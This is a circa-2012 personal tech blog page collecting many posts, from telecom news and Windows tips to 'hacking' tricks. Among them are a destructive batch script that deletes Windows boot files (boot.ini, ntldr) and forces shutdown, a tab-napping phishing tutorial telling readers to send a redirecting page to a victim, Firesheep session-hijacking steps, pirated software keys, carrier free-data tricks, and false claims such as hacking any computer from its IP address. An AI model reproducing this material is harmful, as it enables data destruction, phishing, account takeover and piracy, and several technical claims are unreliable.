Showing posts with label technology. Show all posts
Showing posts with label technology. Show all posts

Recharge Tata Docomo prepaid card via Twitter

Now, Tata Docomo customers can recharge their prepaid card via Twitter




Tata Docomo
Tata Docomo has teamed up with micro-blogging site Twitter to launcha new initiative called Twittcom, that will allow its GSM Pre -paid customers to recharge and activate a Value added service/ application through Twitter.

Twittcom, has been developed indigenously by the team at Tata Teleservices Limited.

Commenting on the new service, Ritesh Ghosal, Head of Brand Marketing at Tata Teleservices Limited said, “As a brand, Tata DOCOMO has always differentiated itself with its Innovations, whether it is 1p/sec pricing for calls, or
advertising, efforts have always been made to add value to the lives of consumers. With the increasing consumption of Internet and the rise of social media it makes ample sense to be present on the medium where people are spending time at present or they are likely to spend time in the future. Our community on Facebook is amongst the strongest in the world and Twitter too will reach the same levels quite soon.”

To use Twittcom, Tata Docomo customers need to follow this simple process:

- Go to the Twitter handle of the company @tatadocomo, and type in #reg

- They will then receive a pin code for verification through SMS.

- Once the verification code is received, customers need to go to the twitter handle again, and key in #code . They will then get a retweet confirming registration.

- For activating value added services, customers need to go to the handle (@tatadocomo) and key in #act# . They will then get a twit back confirming activation of the service.

How to make Windows 7 Bootable USB Pendrive


Hello,
Many of us face a lot of problem when we have to reinstall windows on our computer or laptop. First thing we have to decide from where to install windows? The options available are DVD or USB Pendrive. In the latest new netbooks, mostly there is no DVD drive. So if you want to install windows you have to go with the other option, i.e. USB Pendrive. So here I give a brief and 100% tested tutorial on how to create a Windows 7 Bootable USB Pendrive to install Windows 7 from USB Pendrive.
First thing, you should check whether your BIOS supports booting from USB. Most of the computer/laptops support. But if your BIOS doesn’t, then sorry, you cannot boot from a USB Pendrive.
Second thing, you need another computer with Windows installed with a DVD drive, to copy its contents later.
So let us start with the procedure now:
1) Run command prompt (cmd). This can be done by clicking start and typing typing cmd in Windows 7. In Windows Xp, click on start and then click on run. Type cmd and run. This will open the command prompt which will look like this:
2) Then run diskpart utility from command prompt, by typing ‘diskpart’ on command prompt and pressing enter. This will run the diskpart utility in a separate windows, which is shown in 2nd picture below:
3) Now put in your pendrive in a USB port. Your pen drive must be atleast 4 GB, 8 GB pendrive is best for this purpose. Now go back to the diskpart console and type ‘listdisk’ and press enter. This will list the various storage devices available. You can see the size column of the disk and here we can see that ‘disk 2′ is our pen drive. Warning: In your computer it may be some other number. In our case it is ‘disk 2′.
4) Then you have to type ‘select disk 2′ and press enter. Note: in our case it is disk 2, in your case it may be disk 3, or disk 1 or any other number. You can enter ‘detail disk’ to see the details of the disk after selecting it to verify that you have selected the correct disk. You can see these steps in the image below:
5) Then you have to run a series of commands. The commands to be run in the order are:- clean
- create partition primary
- select partition 1
- active
- format fs=fat32
These steps are shown in the image below:
6) The format step will take some time. You can have a tea or coffee in the meantime and come back. After the format is complete you have to run ‘assign’ command. And after this you can exit diskpart utility by entering the ‘exit’ command. The steps are shown below:
- assign
- exit
- The image below shows all the steps taken from the first step:
7) After the format is complete, put in your original Windows 7 DVD in your DVD drive, or if you have an .iso image of the DVD, mount that image using any virtual drive software like Power ISO.
- Now go to My Computer, and open the contents of DVD Drive. Press ‘ctrl+a’ to select all contents and copy all the contents by pressing ‘ctrl+c’.
- Now go back to My Computer and open the USB Drive and press ‘ctrl+v’ to paste all the contents of DVD into the USB Disk.

8) When the copy finishes, you are done just remove the USB Drive safely and use it to install Windows 7 in your computer/laptop.

Please follow the blog, if you think the post was helpful
Thanks

Team Viewer 7.0 free download

Team Viewer 7.0
TeamViewer is an excellent screen-sharing and file-transfer app that can be used to facilitate business collaborations, remotely access a second computer, or help distraught relatives diagnose and cure computer problems. Along with being free for noncorporate use, it gives users precisely the tools they need to share screens securely, send files with a minimum of hassle, control access rights, and even flip which user has control.

The options available while you're in control work smoothly. You can maximize the pane that the other computer's screen is visible in, as well as utilize several smart options from a drop-down toolbar in the center of the window. A big X lets you close the connection, while the Actions button lets you switch who's in control, disable remote input, and reboot remotely. The View menu hides options to adjust the screen resolution, the optimization toward speed or quality, and control multiple-monitor displays. New features that work just as effortlessly as the old ones include VoIP audio and video conferencing, and integrated teleconferencing. These features push TeamViewer a notch above the rest because they will work without requiring firewall reconfiguration.

When you log in, you're given an access code and a password. Sharing those allows your computer to be controlled by the level you set it to: remote support, presentation, file transfer, or VPN. The TeamViewer servers remember which computers you've connected to, so reconnecting to previously shared computers happens faster. TeamViewer also has a Web-based version, for remote connecting to home from public computer. Even the installation process is impressive. Users can toggle admin rights, can opt out of running at startup, and can opt into installing the TeamViewer VPN driver for more secure screen sharing. TeamViewer makes screen-sharing and file-sharing as fluid and unobtrusive as it should be, and is a must-have for the home or remote office user.


Tune Up Utilities 2012 Free Download

Tune Up Utilities 2012
TuneUp Utilities 2012 presents a wide range of useful system maintenance and optimization tools in one interface. Some tools you'll use to regularly clean your system, while others only need to be run only once in a while or if you have a specific Windows problem. The 2012 version of TuneUp Utilities also includes the Program Deactivator, which disables unused programs until you need them, and Economy Mode, which can help laptop users improve battery life. TuneUp Utilities is free to try for 15 days. A nag screen tracks the trial period.


TuneUp Utilities keeps things simple with its 1-Click Maintenance scan feature, which combines tools for deleting temporary files, cleaning and defragmenting the registry, removing broken shortcuts, optimizing system startup and shutdown, and defragmenting hard drives. The scan recommended various actions, but we liked that you could exclude any you didn't want to implement. The program's main interface toggles between a summary overview and a tabbed Category view. Creating a Profile let us save our system maintenance preferences as well as configure the optional Economy Mode and Turbo Mode. The Program Deactivator made specific recommendations for restoring system performance, such as disabling and uninstalling unused programs. TuneUp Utilities also recommended changing our browser and display settings to reduce performance-hogging processes. The Fix Problems tab offers a number useful fixes for common Windows problem like desktop icon errors. Under Settings, we could integrate the Disk Space Explorer and Shredder (secure delete) tools into Windows context menus and the Undelete tool with the Recycle Bin. Some users have reported difficulty uninstalling TuneUp Utilities during or after the trial period, but we had no such troubles, and the product uninstalled cleanly and completely.

We just scratched the surface TuneUp Utilities 2012's features since many are used for specific errors or issues, but we found the program to be a simple way to perform basic but necessary maintenance. While experienced Windows users may prefer separate freeware applications to an all-in-one approach, others will like the recommendations and tweaks packaged together in TuneUp Utilities 2012.


Click On the button To Download






Here are 5 product keys for you:

Name: Any
Organization: Any
Product Key:
M8076E-27T3AN-F2MVXJ-D9FF52-63VE2X-5W8772
W6DB76-EHNH3K-K4E5AN-5JMNR3-3254MK-52BWYR
RX5NFQ-2A11PM-C1B7F4-K6KA0N-7P3BQ4-WRYD8E
5A42PP-V0Q605-2YJHMX-CJKW9J-4WQKKQ-E8RVNX
2JEDV1-8QYXN0-Y9AJ5W-DBC9E3-YCBNAJ-KVAPT6

Enjoy . . .

Collection of Hacking books free download

Here I am going to post a large collection of hacking books. There are more than 150 books in this collection on almost every field of computer and network hacking. The name of books are given below with download link at the bottom of the post.


This collection includes:


(Ebook - Computer) Hacking The Windows Registry.pdf


(eBook - PDF) Hugo Cornwall - The Hacker's Handbook .pdf


(eBook pdf) Hacking into computer systems - a beginners guide.pdf


(ebook_-_pdf)_Hacking_IIS_Servers.pdf


0321108957.Addison-Wesley Professional.Honeypots- Tracking Hackers.pdf


0764578014.Wiley.The Database Hacker's Handbook- Defending Database Servers.chm


076459611X.John Wiley &amp_ Sons.Hacking GMail (ExtremeTech).pdf


1246523-Hacking.Guide.V3.1.pdf


1931769508.A-List Publishing.Hacker Linux Uncovered.chm


2212948-Hacker'S.Delight.chm


285063-Hacker.Bibel.pdf


3077366-HackerHighSchool.pdf


731986-Hacker's Desk Reference.pdf


A Beginners Guide To Hacking Computer Systems.pdf


Addison Wesley - Hackers Delight 2002.pdf


addison wesley - web hacking - attacks and defense.chm


Addison Wesley, The Outlook Answer Book Useful Tips Tricks And Hacks (2005) Bbl Lotb.chm


amazon-hacks.chm


Anti-Hacker ToolKit - McGraw Hill 2E 2004.chm


Attacking the DNS Protocol.pdf


Auerbach.Practical.Hacking.Techniques.and.Countermeasures.Nov.2006.pdf


Auerbach.Pub.The.Hackers.Handbook.The.Strategy.Behind.Breaking.into.and.Defending.Networks.Nov.20.pdf


bsd-hacks.pdf


ceh-official-certified-ethical-hacker-review-guide-exam-312-50.9780782144376.27422.pdf


Certified Ethical Hacker (CEH) v3.0 Official Course.pdf


Computer - Hackers Secrets - e-book.pdf


cracking-sql-passwords.pdf


Crc Press - The Hacker'S Handbook.pdf


Credit.Card.Visa.Hack.Ucam.Cl.Tr.560.pdf


DangerousGoogle-SearchingForSecrets.pdf


database hacker handbook.chm


Dummies - Hack How To Create Keygens (1).pdf


ebay-hacks-100-industrial-strength-tips-and-tools.pdf


ebook.oreilly.-.windows.xp.hacks.sharereactor.chm


eBooks.OReilly.-.Wireless.Hacks.100.Industrial.-.Strength.Tips.and.Tools.chm


ethical hacking, student guide.pdf


excel-hacks.chm


For.Dummies.Hacking.for.Dummies.Apr.2004.eBook-DDU.pdf


For.Dummies.Hacking.Wireless.Networks.For.Dummies.Sep.2005.eBook-
DDU.pdf


google-hacks.pdf


Hack IT Security Through Penetration Testing.pdf


Hack Proofing - Your Network - Internet Tradecraft.pdf


Hack Proofing Linux A Guide to Open Source Security - Stangler, Lane - Syngress - ISBN 1-928994-34-2.pdf


Hack Proofing Sun Solaris 8.pdf


Hack Proofing Your E-Commerce Site.pdf


Hack Proofing Your Identity In The Information Age.pdf


Hack Proofing Your Network Second Edition.pdf


Hack Proofing Your Network_First Edition.pdf


Hack Proofing Your Web Applications.pdf


Hacker Disassembling Uncovered.chm


hacker ethic.pdf


Hacker Linux Uncovered.chm


Hacker Web Exploitation Uncovered.chm


Hacker'S.Delight.chm


hacker-disassembling-uncovered.9781931769228.20035.chm


Hackers Beware.pdf


Hackers Secrets Revealed.pdf


Hackers Secrets.pdf


Hackers, Heroes Of The Computer Revolution.pdf


Hackers_Secrets.pdf


Hacker_s_Guide.pdf


Hacking - Firewalls And Networks How To Hack Into Remote Computers.pdf


Hacking - The Art of Exploitation.chm


Hacking Cisco Routers.pdf


Hacking Exposed - Network Security Secrets & Solutions, 2nd Edition.pdf


Hacking Exposed Network Security Secrets & Solutions, Third
Edition ch1.pdf


Hacking For Dummies 1.pdf


Hacking For Dummies 2.pdf


Hacking For Dummies.pdf


Hacking GMail.pdf


Hacking IIS Servers.pdf


Hacking into computer systems - a beginners guide.pdf


Hacking the Code - ASP.NET Web Application Security Cookbook (2004) .chm


hacking the windows registry .pdf


Hacking Windows XP.pdf


Hacking-ebook - CIA-Book-of-Dirty-Tricks1.pdf


Hacking-Hacker's Guide.pdf


Hacking-Hackers Secrets Revealed.pdf


Hacking-Hugo Cornwall-The Hacker's Handbook .pdf


Hacking-The Hacker Crackdown.pdf


Hacking.For.Dummies.Access.To.Other.People's.System.Made.Simple.pdf


Hacking.Guide.V3.1.pdf


Hackproofing Oracle Application Server.pdf


hacks.sfv


Hack_Attacks_Revealed_A_Complete_Reference_With_Custom_Security_Hacking_Toolkit.chm


Hack_IT_Security_Through_Penetration_Testing.chm


Halting.The.Hacker.A.Practical.Guide.To.Computer.Security.chm


How to Crack CD Protections.pdf


John Wiley & Sons - Hacking For Dummies.pdf


John.Wiley.and.Sons.Hacking.Windows.XP.Jul.2004.eBook-DDU.pdf


John.Wiley.and.Sons.Hacking.Windows.XP.Jul.2004.eBook.pdf


John.Wiley.and.Sons.The.Art.of.Intrusion.The.Real.Stories.Behind.the.Exploits.of.Hackers.Intruders.
and.Deceivers.Feb.2005.ISBN0764569597.pdf


Jon.Erickson.Hacking.The.Art.Of.Exploitation.No.Starch.Press.2003.chm


linux-server-hacks.pdf


Linux-Server.Hacks-OReilly.pdf


little_black_book_oc_computer_viruses.pdf


mac-os-hacks.chm


McGraw Hill - Web Applications (Hacking Exposed).pdf


McGraw-Hill - Hacking Exposed, 3rd Ed - Hacking Exposed Win2.pdf


McGraw.Hacking.Exposed.Cisco.Networks.chm


McGraw.Hill.HackNotes.Linux.and.Unix.Security.Portable.Reference.eBook-DDU.pdf


McGraw.Hill.HackNotes.Network.Security.Portable.Reference.eB.pdf


McGraw.Hill.HackNotes.Network.Security.Portable.Reference.eBook-DDU.pdf


McGraw.Hill.HackNotes.Web.Security.Portable.Reference.eBook-.pdf


McGraw.Hill.HackNotes.Web.Security.Portable.Reference.eBook-DDU.pdf


McGraw.Hill.HackNotes.Windows.Security.Portable.Reference.eB.pdf


McGraw.Hill.HackNotes.Windows.Security.Portable.Reference.eBook-DDU.pdf


Mind Hacks - Tips & Tricks for Using Your Brain.chm


network-security-hacks.chm


No.Starch.Press.Hacking.The.Art.Of.Exploitation.chm


O'Reilly - Online Investing Hacks.chm


O'Reilly.-.Network.Security.Hacks.chm


O'Reilly.Windows.Server.Hack.chm


O'Reilly.Windows.Server.Hack.rar


online-investing-hacks.chm


OReilly Google Hacks, 1st Edition2003.pdf


OReilly - Flickr Hacks Tips and Tools for Sharing Photos Online (Feb 2006).chm


OReilly - Google Hacks.pdf


Oreilly Access Hacks Apr 2005.chm


Oreilly, Paypal Hacks (2004) Ddu.chm


OReilly,.Digital.Video.Hacks.(2005).DDU.LotB.chm


OReilly,.IRC.Hacks.(2004).DDU.chm


oreilly,.visual.studio.hacks.(2005).ddu.lotb.chm


Oreilly.Amazon.Hacks.eBook.LiB.chm


oreilly.firefox.hacks.ebook-lib.chm


OReilly.Google.Hacks.2nd.Edition.Dec.2004.ISBN0596008570.chm


OReilly.Google.Maps.Hacks.Jan.2006.chm


Oreilly.Linux.Desktop.Hacks.Mar.2005.eBook-LiB.chm


OReilly.Linux.Server.Hacks.Volume.Two.Dec.2005.chm


OReilly.Network.Security.Hacks.chm


OReilly.PayPal.Hacks.Sep.2004.eBook-DDU.chm


OReilly.PC.Hacks.Oct.2004.eBook-DDU.chm


OReilly.Perl.Hacks.Tips.and.Tools.for.Programming.Debugging.and.Surviving.May.2006.chm


OReilly.Skype.Hacks.Tips.and.Tools.for.Cheap.Fun.Innovative.Phone.Service.Dec.2005.chm


OReilly.SQL.Hacks.Nov.2006.chm


OReilly.Statistics.Hacks.May.2006.chm


OReilly.Ubuntu.Hacks.Tips.and.Tools.for.Exploring.Using.and.Tuning.Linux.Jun.2006.chm


OReilly.VoIP.Hacks.Tips.and.Tools.for.Internet.Telephony.Dec.2005.chm


oreilly.windows.xp.hacks.2nd.edition.feb.2005.lib.chm


OReilly.Word.Hacks.Oct.2004.eBook-DDU.chm


OSB.Ethical.Hacking.and.Countermeasures.EC.Council.Exam.312.50.Student.Courseware.eBook-LiB.chm


O_Reilly_-_Windows_XP_Hacks.chm


PC Games - How to Crack CD Protection.pdf


prentice hall - pipkin - halting the hacker- a practical guide to computer security, 2nd edition.chm


Que - UNIX Hints Hacks.chm


Que.Certified.Ethical.Hacker.Exam.Prep.Apr.2006.chm


Security and Hacking - Anti-Hacker Tool Kit Second Edition.chm


SoTayHacker1.0.chm


spidering-hacks.chm


SQL Hacks.chm


SQLInjectionWhitePaper.pdf


Syngress - Hack Proofing Linux (2001).pdf


Syngress - Hack Proofing Your Identity in the Information Age - 2002.pdf


Syngress - Hacking a Terror Network. The Silent Threat of Covert Channels.pdf


Syngress -- Hack Proofing Your Wireless Network.pdf


Syngress Hack Proofing Your Identity in the Information Age.pdf


Syngress.Buffer.Overflow.Attacks.Dec.2004.eBook-DDU.pdf


Syngress.Hack.the.Stack.Oct.2006.pdf


Syngress.Hacking.a.Terror.Network.Nov.2004.ISBN1928994989.pdf


The Little Black Book Of Computer Virus.pdf


the-database-hackers-handbook-defending-database-servers.9780764578014.25524.chm


The_20Little_20Black_20Book_20of_20Computer_20Viruses.pdf


tivo-hacks.100-industrial-strength-tips-and-tools.pdf


u23_Wiley - Hacking GPS - 2005 - (By Laxxuss).pdf


Websters.New.World.Websters.New.World.Hacker.Dictionary.Sep.2006.pdf


Wiley.Hacking.Firefox.More.Than.150.Hacks.Mods.and.Customizations.Jul.2005.eBook-DDU.pdf


Wiley.Hacking.Google.Maps.and.Google.Earth.Jul.2006.pdf


Wiley.Hacking.GPS.Mar.2005.ISBN0764598805.pdf


Wiley.Lifehacker.Dec.2006.pdf


Wiley.The.Database.Hackers.Handbook.Defending.Database.Servers.chm


Win XP Hacks oreilly 2003.chm


Windows Server Hacks.chm


WinXP SP1 Hack.pdf


Xbox-hack - AIM-2002-008.pdf


Yahoo.Hacks.Oct.2005.chm


Hackers Beware Defending Your Network From The Wiley Hacker.pdf


Download Here:

Tab Napping.. an easy way of phishing..in detail

Tab Napping - An easy way of phishing
Phishing is the easiest and most popular way of email account hacking. Now a days a new way of phishing is used by hackers. This is called tab napping . I also wrote about it in one of my previous posts. I also posted a JavaScript code which is used for Tab napping as a Tab napping script .
But many of my readers are still facing problems in this script. So i decided to write this post.


The idea behind this is very simple. First of all i suggest you to read my last posts on tab napping and then download the script.


Tab napping is all about the relation of 2 pages. suppose Page A and Page B.


Victim was viewing page A in a tab of a browser and then left this idle and and now using some other website in another tab of browser .After some time the page A will automatically change to Page B. This Page B is your phishing page. Idea is to confuse the victim in multiple tabs of browser.


In Detail....

Make a web page and use the tab napping script in that page say it page A. That script will not affect the layout or content of the page. This script will check for user actions. If the page is idle for some time, this script will redirect this page to a pre-specified page which may be your phishing page. You have to specify this page in the script. Be sure to change this in script.
check script for this line...
timerRedirect = setInterval("location.href='http://www.gmail.com'",10000);
this line will redirect to Gmail after 10 sec. Change this location to the address of your phishing page. This line is used 2 times in the script so change is both lines.


so page A with tab napping script will redirect to phishing page B.


Now send the link of the page A to your victim. This is a normal page. If the page is idle for some time it will be changed to page B otherwise no effect.


How to download a Tab Napping script ??? Answer in my next post, so wait . . .

please comment and follow below if this post is useful for you..
:)

Firesheep – Social Network Session Stealing/Hijacking Tool


Firesheep

Stealing sessions/password is now easy with Firesheep and anyone can do it,very easily, which is somewhat scary. This tool provides you a single click hack.
After downloading FireSheep as add-on your mozilla firefox, now you get a side bar.Now log in to a public WiFi spot and click a button "start capturing. 

You’ll then be shown images and user names of various people using networks such as Facebook, Twitter, Flickr, bit.ly, Google and Amazon in that side bar. 

With a double click on their image, you’ll be logged in as them immediately. You can log in to any people's account who is using his account in that network.


Download here:
http://github.com/downloads/codebutler/firesheep/firesheep-0.1-1.xpi

4G - All you need to know . . .

4G released in India on 10th April, 2012 . . .
Bharti Airtel on Tuesday become the first company in India to offer high-speed Internet services using fourth-generation (4G) telecommunications technology.

The company said high-speed wireless broadband "has the potential to transform India" and to provide a platform for "building the country's digital economy."

4G launched in India


What's new in 4G technology?

4G, known as the ultra-broadband allows mobile phone users to surf the Internet, video conference and download music, video and other content at a rate several times faster than 3G services that are still being rolled out across the country.

A successor to the 3G and 2G families, 4G is expected to be five times quicker than 3G services. It would offer services such as high-definition mobile TV and video conferencing.

Analysts say India's rural areas offer huge market potential but erecting infrastructure to support high-speed networks will be costly, making urban areas the immediate battlegrounds for customers.

Mittal said that the TD-LTE (Long Term Evolution) technology adopted by Airtel would be the platform for future broadband revolution.

"We hope that this technology would be emulated and followed by those who got Braodband Wireless Access (BWA) licenses," he said at the launch event.


Airtel's 4G services

"Today's launch is a major milestone for India and Airtel," Bharti Airtel chairman Sunil Mittal said in a statement on 10th April, 2012.

Bharti rolled out the 4G wireless broadband services in Kolkata and is working on launching advanced technology networks in other parts of the country. Bharti Airtel will shortly roll them out in the other three circles of Karnataka, Punjab and Maharashtra (excluding Mumbai).

"We will launch the 4G LTE service in Bangalore this month, followed by Pune and Chandigarh," Bharti Airtel Chairman Sunil Mittal said.

With one of the largest pools of young people in the world, India will see massive growth in consumption of data and content over mobile devices and proliferation of mobile commerce, analysts say.

Bharti and its rivals paid a total Rs 38,543 crore ($7.5 billion) to buy fourth-generation (4G) wireless broadband spectrum in a 2010 auction, which saw bids at much higher prices than initially expected.

Bharti managed to win 4G spectrum in just four of India's 22 telecoms zones in the auction, paying Rs 3,314 crore for spectrum in the Maharashtra, Karnataka, Kolkata and Punjab zones.

The network for rolling out Airtel's 4G LTE services in the city had been built by Chinese telecom equipment maker ZTE. Airtel is the first mobile operator to launch 4G services in the country. Bharti Airtel has already awarded the contract for building and operating its 4G network in Maharashtra to Nokia Siemens Networks.


Article taken from here

Airtel 3G Hack 2012 For Unlimited Free Internet in High Speed | Free Download Airtel 3G Hacking Software

Airtel 3G

Hello all my Friends, in this post i am telling you about the airtel 3g hack or free gprs internet trick. by using this airtel
3g Hack trick you can access fastest internet on your mobile and 3g data card provided byairtel 3g service. i think this is best trick on the internet. if you are searching for airtel 3g hackthen you are at right place. 

Follow The some simple steps for airtel 3g hack :-


> First You Download this opera mini handler
> Open the browser(opera)
> In proxy type put “real host”
> In proxy field,type “m.twitter.com”
That’s all. Just initialize it and enjoy super fast net with .. That's It

BSNL 3G Hack 2012 For Unlimited Free Gprs | Latest Bsnl Hacking Tricks


BSNL 3G

All Bsnl users new working 3G connection launched by bharathi india Bsnl cellone connection available in prepaid card also so i examined many test with Bsnl accessing free 3G internet connection in both mobile and pc and found new trick by changing the 3G connection settings initially have an 3G sim and activated



GPRS or 3G connection should be activated in your mobile also supported


using this new following connection for free


Name :3G free(any)

Service Type 1 WAP
Gateway IP : 1 10.100.3.2
Port no : 1 : 9209.
Timeout: NEVER
CSD No.1
User Name1: ppp
Password1: ppp123
APN setting:
wapwest.cellone.in
User Name : ppp
Password : ppp123


now save it leave the other settings as default and using this activated settings hack bsnl 3G for free new 2012 trick in bsnl mobile free for 3mbps speed browsing and downloading in bsnl 3G.


That's It

VODAFONE HACK 2012 FOR FREE GPRS AND RECHARGE TRICK | LATEST VODAFONE HACKING TRICKS


Vodafone

Hello Friends ! Today i am going to post Two Latest Tricks for Vodafone users.First Trick is Vodafone free 2 GB Internet Pack Trick and Second Trick is get Rs 16 on the Recharge of Rs 10 .


First Trick :

Just Type BONUS 149 and send it to 144 .

You will get Vodafone 2 GB Internet pack free for 1 Month.



This Trick is Tested and 100 % working in Kerala but don’t know about others states, i think its only for kerala. in india.


Second Trick

Just Send RECHARGE<space> Rs 1O Recharge Voucher Code to 144 (Toll Free).

You will get Rs 16 Balance in Rs 10 Recharge. Means Rs 6 Extra

This Trick is working in many states and 100 % confirmed in Madhya Pradesh.


Enjoy


For New Trick Keep Visiting

How To Detect Keylogger Hardware

Detect keylogger hardware to prevent your sensitive personal data from falling into the wrong hands. If criminals get your personal data, they can use it to open accounts and transfer money from existing accounts.


Run anti-spyware software to learn how to detect keyloggers.
A good anti-spyware or anti-virus program may be able to detect keyloggers. Keyloggers typically hide in sneaky places, and a good anti-virus program that constantly updates its virus definitions can keep track of the latest keylogger tactics. Also, keyloggers function in ways that send red flags to anti-virus programs, so installing these programs, keeping their virus definitions up-to-date and running them regularly can help you detect software keyloggers.

Check your Task List and Startup items to find keyloggers.
If you press the Ctrl + Alt + Del buttons simultaneously, it brings up a Task List, which outlines all the applications and processes currently running on your computer. Many of these processes are normal, and your computer requires them to function. However,

keylogging software has to show up on your application or processes list, so do a Web search for any unfamiliar processes or software to determine whether it's a normal part of Windows operation or whether it may be a keylogger. Likewise, you can run the msconfig utility to determine what starts up when you boot your computer. Once you launch msconfig, look for anything unfamiliar that might be a keylogger.

Have an active, secure firewall to stop keyloggers from transmitting data.
Software keyloggers require an Internet connection to transmit the data they gather from your computer. If you've got an active, secure firewall, keyloggers may not be able to transmit data, thus forming an effective way to block keyloggers. Some firewall programs even alert you when unfamiliar programs attempt to use your Internet access, so you can use this feature to discover whether keyloggers exist on your computer. Maintain an active firewall to help protect yourself from potentially dangerous keyloggers.

You can't detect some types of keylogger hardware.
Hardware keyloggers can be a bit more difficult to detect than software keyloggers. In most cases, hardware keyloggers don't require an Internet connection to transmit data, because they function by storing the data on a little hard drive packaged with the device. If a keylogger is not a software program on your computer, the only way you can detect it is by physically locating the hardware device.
Keylogger hardware come in two forms: adaptors that sit between your keyboard and your computer, and electronic chips that are placed inside your keyboard. If you're a savvy computer user, you may be able to spot the physical adaptor between your keyboard and computer. However, a hardware keylogger chip that's physically built into your keyboard is impossible to detect unless you disassemble your keyboard and know exactly what you're seeing, so you may not be able to detect this type of keylogger.

Amazing New Phone : Flip Phones Are Back






Flip phones were ultra hot at the end of the 90′s and early 2000′s. As long as you weren’t a stuffy “business” person who owned a Blackberry or Palm, you probably had a flip phone. Then, Apple’s iPhone came and changed the world of cell phones completely.


Smart phones took over and the flip phone died.


It’s back. Kind of.


With 3 flexible touchscreens, a triangular design, and custom Android interface, this creative and functional design gives us a glimpse of how smart phones might be flipped themselves.


Looking for an Amazing Cutting Edge Cell Phone? See What’s New.




Excited by what you’ve just seen? Want a killer new cell phone? See What’s New.

What is an IP address?

An IP address or Internet Protocol is a 32-bit number address, which isassigned to each computer (technically called a host) connected to the Internet. It is the address to which different types of data are sent to your computer. It consists of 4 octets. Each octet equals 8 bits and has a range from 0 to 255. (Every IP address on the Internet is sectioned off into classes from class A to class E, depending on a different range of numbers). Well I always believed that sometimes pictures speak louder than words so here is an example of a typical IP address:


189.134.221.61


| | | |

| | | |---------> (4th octet. 8-bits. Ranges from 0 to 255)

| | |-------------> (3rd octet. 8-bits. Ranges from 0 to 255)

| |-----------------> (2nd octet. 8-bits. Ranges from 0 to 255)

|---------------------> (1st octet. 8-bits. Ranges from 0 to 255)

Nokia Basic Hacks !

*#0000# shows the software version


*#746025625# Simclock

Checks if the sim clock can be stopped. Sim clock stop is a kind of stand-by mode which will save battery time. This code doesn't work with software version 4.59.


*#92702689# or *#92772689# Display the phone's software version.

1. Displays Serial Number.


2. Displays the Month and Year of Manufacture (0997)
3. Displays (if there) the date where the phone was purchased (MMYY)
4. Displays the date of the last repayment - if found (0000)
5. makes you capable of transferring user data if you have the gear for it
6. shows how long the phone has been used to talk. This counter is not reset by when you "clear timers" like the counters in the call register

Make ur RAM work better

Clean ur RAM & Make Your Comp Speed Better

Clean Ur RAM
U may recognize that ur system gets slower and slower when playing and working a lot with ur pc. That's cause ur RAM is full of remaining progress pieces u do not need any more.
So create a new text file on ur desktop and call it .. "RAMcleaner" or something...

Type
FreeMem=Space(256000000)
in this file and save it as RAMcleaner.vbs [ You may choose the "All Files" option when u save it ]



Run the file and ur RAM may be cleaned :>
Of course u can edit the code in the file for a greater "cleaning-progress".

FreeMem=Space(5120000000)

just try it out..

Hack Using IP Address

Hack Using IP

Well u can hack any system as it is conected to what we call INTERNET . To connect internet a system allocates a port for communication and Data Transfer. SO here it goes all we goto do is get into that port thats hacking.

Steps: -
1.Download software PORT SCANNER
2.Copy the ip address of the victim whose port is open.


3.Download NETLAB which gives u all information includes victim ip address,Area from where he is accessing internet....
4.Paste the ip of victim u found initially into NETLAB .Thats it u access his system.

MAKE YOUR MENUS LOAD FASTER

This trick remove the slight delay between clicking on a menu and XP displaying the menu.

Go to Start then Run
Type 'Regedit' then click 'Ok'
Find "HKEY_CURRENT_USER\Control Panel\Desktop\"
Select "MenuShowDelay"
Right click and select "Modify'


Reduce the number to around "100"
This is the delay time before a menu is opened. You can set it to "0" but it can make windows really hard to use as menus will open if you just look at them - well move your mouse over them anyway.

Trick to show your name in taskbar

Here is a trick to add your name in place of AM and PM beside time in the taskbar.

It's simple
Goto Start -> Control Panel -> Regional and Language option -> Customize (beside English US) -> Go to TIME tab -> Change AM symbol and PM symbol from AM and PM to your name -> Apply -> Ok ...


IS it changed ??? May be not ...

Now go to time in taskbar and Double Click it to open "Date and time property" ...
Look at the place where time changes in digital format i.e. 02:47:52 AM , click to arrow to chage the AM or PM by selecting and press arrow.
Apply -> OK.

It will Show your name!!

Virus That Crashes Ur Own PC

Open Notepad and type the following code in it:


@echo
offattrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
@echo off
msg * YOU GOT OWNED!!!
shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive



Save as bat file in notepad!!
This will pop up a message saying OWNED!!
And shut down the computer never to reboot again!

Type this in notepad

start virus.bat
virus.bat
and save as with this name - virus.bat

ur antivirus will not detect this virus.

Basically this program will delete all that files which are needed for bootingIf your os is installed in d drive instead of c then replace c with d.


Never try this on your own computer . . . .
 
My Other Sites : My Poems | My Drawings | My Tech Blog
Copyright © 2011. Live Out Loud . . . . - All Rights Reserved
Rise Up !!! Speak Loud, Shout Out What You Feel !!!
Proudly shout - Live Out Loud !!!